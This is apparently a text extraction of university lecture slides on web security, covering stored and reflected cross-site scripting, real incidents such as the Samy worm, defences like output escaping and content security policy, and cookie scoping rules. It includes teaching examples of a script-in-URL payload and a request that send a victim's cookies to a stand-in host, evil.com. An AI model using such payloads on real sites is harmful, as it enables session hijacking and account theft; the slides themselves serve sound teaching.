Web Security: XSS; Sessions

CS 161: Computer Security Prof. Raluca Ada Popa Mar 22, 2018

Credit: some slides are adapted from previous offerings of this course or from CS 241 of Prof. Dan Boneh

SQL Injection Demo

XSS Attacks

Top web vulnerabilities

OWASP Top 10 - 2010 (Previous)	OWASP Top 10 – 2013 (New)	
A1 – Injection	A1 – Injection	
A3 – Broken Authentication and Session Management	A2 – Broken Authentication and Session Management	
A2 – Cross-Site Scripting (XSS)	A3 – Cross-Site Scripting (XSS)	
A4 – Insecure Direct Object References	A4 – Insecure Direct Object References	
A6 – Security Misconfiguration	A5 – Security Misconfiguration	
A7 – Insecure Cryptographic Storage – Merged with A9 $ ightarrow$	A6 – Sensitive Data Exposure	
A8 – Failure to Restrict URL Access – Broadened into $ ightarrow$	A7 – Missing Function Level Access Control	
A5 – Cross-Site Request Forgery (CSRF)	A8 – Cross-Site Request Forgery (CSRF)	
 suried in A6: Security Misconfiguration>	A9 – Using Known Vulnerable Components	

Cross-site scripting attack (XSS)

- Attacker injects a malicious script into the webpage viewed by a victim user
 - Script runs in user's browser with access to page's data
- The same-origin policy does not prevent XSS

Two main types of XSS

- *Stored* XSS: attacker leaves Javascript lying around on benign web service for victim to load
- Reflected XSS: attacker gets user to click on specially-crafted URL with script in it, web service reflects it back

Stored (or persistent) XSS

- The attacker manages to store a malicious script at the web server, e.g., at bank.com
- The server later unwittingly sends script to a victim's browser
- Browser runs script in the same origin as the bank.com server

Demo + fix

Attack Browser/Server



evil.com

Attack Browser/Server



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		F

Attack Browser/Server





Server Patsy/Victim



Stores the script!



Attack Browser/Server



Attack Browser/Server



Attack Browser/Server



Attack Browser/Server



Attack Browser/Server





Attack Browser/Server And/Or: 6 leak valuable data evil.com E.g., GET http://evil.com/steal/document.cookie malicious request content **User Victim** script *3 receive malicious script* Server Patsy/Victim Perform attacker action execute script Stores embedded in input the as though server script! meant us to run it

Attack Browser/Server



XSS subverts the same origin policy

- Attack happens within the same origin
- Attacker tricks a server (e.g., bank.com) to send malicious script ot users
- User visits to bank.com

Malicious script has origin of bank.com so it is permitted to access the resources on bank.com

MySpace.com (Samy worm)

- Users can post HTML on their pages
 - MySpace.com ensures HTML contains no

<script>, <body>, onclick,

• ... but can do Javascript within CSS tags: <div style="background:url(`javascript:alert(1)')">

- With careful Javascript hacking, Samy worm infects anyone who visits an infected MySpace page
 - ... and adds Samy as a friend.
 - Samy had millions of friends within 24 hours.

Twitter XSS vulnerability

User figured out how to send a tweet that would automatically be retweeted by all followers using vulnerable TweetDeck apps.

| ALL | andy
der Geruhn | | | \$ | Sollow |
|---|---------------------|----------------------|-------------------|--------------------------|--------|
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| | | | | | |

Stored XSS using images

Suppose pic.jpg on web server contains HTML !

• request for http://site.com/pic.jpg results in:

```
HTTP/1.1 200 OK
...
Content-Type: image/jpeg
<html> fooled ya </html>
```

- IE will render this as HTML (despite Content-Type)
- Consider photo sharing sites that support image uploads
 - What if attacker uploads an "image" that is a script?

Reflected XSS

- The attacker gets the victim user to visit a URL for bank.com that embeds a malicious Javascript or malicious content
- The server echoes it back to victim user in its response
- Victim's browser executes the script within the same origin as bank.com



1 visit web site

Attack Server

| The second se | |
|---|--|

evil.com



Victim client















Example of How Reflected XSS Can Come About

- User input is echoed into HTML response.
- Example: search field
 - http://bank.com/search.php?term=apple

How does an attacker who gets you to visit evil.com exploit this?

Injection Via Script-in-URL

Consider this link on evil.com: (properly URL encoded)

http://bank.com/search.php?term=

<script> window.open(

"http://evil.com/?cookie = " +

document.cookie) </script>

What if user clicks on this link?

- 1) Browser goes to bank.com/search.php?...
- 2) bank.com returns

```
<hr/>
```

3) Browser executes script in same origin as bank.com Sends to evil.com the cookie for bank.com

PayPal 2006 Example Vulnerability

- Attackers contacted users via email and fooled them into accessing a particular URL hosted on the legitimate PayPal website.
- Injected code redirected PayPal visitors to a page warning users their accounts had been compromised.
- Victims were then redirected to a phishing site and prompted to enter sensitive financial data.
You Can Apparently Leave a Poop Emoji—Or Anything Else You Want—on Trump's Website

By Jordan Weissmann



Trump's site hacked around elecions ... apparently reflected XSS!!!!

You could insert anything you wanted in the headlines by typing it into the URL – a form of reflected XSS

And https://www.donaldjtrump.com/press-releases/archive

/trump%20is%20bad%20at%20internet gets you:



Reflected XSS: Summary

- Target: user with Javascript-enabled *browser* who visits a vulnerable *web service* that will include parts of URLs it receives in the web page output it generates
- Attacker goal: run script in user's browser with same access as provided to server's regular scripts (subvert SOP = Same Origin Policy)
- Attacker tools: ability to get user to click on a specially-crafted URL; optionally, a server used to receive stolen information such as cookies
- Key trick: server fails to ensure that output it generates does not contain embedded scripts other than its own

How to prevent XSS?

Preventing XSS

Web server must perform:

- Input validation: check that inputs are of expected form (whitelisting)
 - Avoid blacklisting; it doesn't work well
- Output escaping: escape dynamic data before inserting it into HTML

Output escaping

- HTML parser looks for special characters: < > & "'
 - <html>, <div>, <script>
 - such sequences trigger actions, e.g., running script
- Ideally, user-provided input string should not contain special chars
- If one wants to display these special characters in a webpage without the parser triggering action, one has to escape the parser

Character	Escape sequence
<	<
>	>
&	&
w	"
x	'



gets displayed!

Escape user input!



XSS prevention (cont'd): Content-security policy (CSP)

- Have web server supply a whitelist of the scripts that are allowed to appear on a page
 - Web developer specifies the domains the browser should allow for executable scripts, disallowing all other scripts (including **inline scripts**)
- Can opt to globally disallow script execution

Summary

- XSS: Attacker injects a malicious script into the webpage viewed by a victim user
 - Script runs in user's browser with access to page's data
 - Bypasses the same-origin policy
- Fixes: validate/escape input/output, use CSP

Session management

HTTP is mostly stateless

- Apps do not typically store persistent state in client browsers
 - User should be able to login from any browser
- Web application servers are generally "stateless":
 - Most web server applications maintain no information in memory from request to request
 - Information typically stored in databases
 - Each HTTP request is independent; server can't tell if 2 requests came from the same browser or user.
- Statelessness not always convenient for application developers: need to tie together a series of requests from the same user

HTTP cookies



Cookies

• A way of maintaining state





Browser maintains cookie jar

Setting/deleting cookies by server



- The first time a browser connects to a particular web server, it has no cookies for that web server
- When the web server responds, it includes a **Set-Cookie:** header that defines a cookie
- Each cookie is just a name-value pair

View a cookie

In a web console (firefox, tool->web developer->web console), type document.cookie to see the cookie for that site

Cookie policy

- A cookie can be accessed in mostly two ways:
 - When a user visits a site, the user's browser sends automatically relevant cookies
 - Javascript can access it via document.cookie
- The cookie policy specifies which cookies will be sent by the browser to which sites
- Cookie policy is different from same-origin policy



- When the browser connects to the same server later, it includes a Cookie: header containing the name and value, which the server can use to connect related requests.
- Domain and path inform the browser about which sites to send this cookie to



- Secure: sent over https only
 - https provides secure communication (privacy and integrity)



- Expires is expiration date
 - Delete cookie by setting "expires" to date in past
- HttpOnly: cookie cannot be accessed by Javascript, but only sent by browser

 Scope of cookie might not be the same as the URL-host name of the web server setting it

Rules on:

- 1. What scopes a URL-host name is allowed to set
- 2. When a cookie is sent to a URL

What scope a server may set for a cookie

The browser checks if the server may set the cookie, and if not, it will not accept the cookie.

domain: any domain-suffix of URL-hostname, except TLD [top-level domains,

e.g. `.com']

example: host = "login.site.com"

allowed domains	disallowed domains
login.site.com	user.site.com
.site.com	othersite.com

.com

⇒ login.site.com can set cookies for all of .site.com
 but not for another site or TLD
 Problematic for sites like .berkeley.edu

path: can be set to anything

When browser sends cookie



GET //URL-domain/URL-path Cookie: NAME = VALUE Server

Goal: server only sees cookies in its scope

Browser sends all cookies in URL scope:

- cookie-domain is domain-suffix of URL-domain, and
- cookie-path is prefix of URL-path, and
- [protocol=HTTPS if cookie is "secure"]

When browser sends cookie



GET //URL-domain/URL-path Cookie: NAME = VALUE Server

A cookie with

domain = example.com, and

path = /some/path/

will be included on a request to

http://foo.example.com/some/path/subdirectory/hello.txt

Examples: Which cookie will be sent?

```
cookie 1
name = userid
value = u1
domain = login.site.com
path = /
non-secure
```

```
cookie 2
name = userid
value = u2
domain = .site.com
path = /
non-secure
```

http://checkout.site.com/ http://login.site.com/ http://othersite.com/ cookie: userid=u2 cookie: userid=u1, userid=u2 cookie: none

Examples

cookie 1 name = **userid** value = u1domain = login.site.com path = /secure

cookie 2 name = **userid** value = u^2 domain = .site.com path = /non-secure

http://checkout.site.com/ http://login.site.com/ https://login.site.com/

cookie: userid=u2cookie: userid=u2cookie: userid=u1; userid=u2

(arbitrary order)

Examples

Web server at foo.example.com wants to set cookie with domain:

domain	Whether it will be set, and if so, where it will be sent to	
(value omitted)	foo.example.com (exact)	
bar.foo.example.com		
foo.example.com		
baz.example.com		
example.com	''	
ample.com		
.com		

Credits: The Tangled Web: A Guide to Securing Modern Web Applications, by Michał Zalewski

Examples

Web server at foo.example.com wants to set cookie with domain:

domain	Whether it will be set, and if so, where it will be sent to
(value omitted)	foo.example.com (exact)
bar.foo.example.com	Cookie not set: domain more specific than origin
foo.example.com	*.foo.example.com
baz.example.com	Cookie not set: domain mismatch
example.com	*.example.com
ample.com	Cookie not set: domain mismatch
.com	Cookie not set: domain too broad, security risk

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Client side read/write: document.cookie

- Setting a cookie in Javascript: document.cookie = "name=value; expires=...;"
- Reading a cookie: alert(document.cookie) prints string containing all cookies available for document (based on [protocol], domain, path)
- Deleting a cookie:

document.cookie = "name=; expires= Thu, 01-Jan-70"

document.cookie often used to customize page in Javascript

Viewing/deleting cookies in Browser UI

Firefox: Tools -> page info -> security -> view cookies

Site	Cookie Name	
google.com	NID	*
google.com	SNID	E
google.com	utmz	
google.com	utma	
google.com	utmz	*
Name:utma Content: 173272373.288555819 Domain: .google.com Path: /adsense/ Send For: Any type of connecti Expires: Sunday, January 17, 2	011	84872.1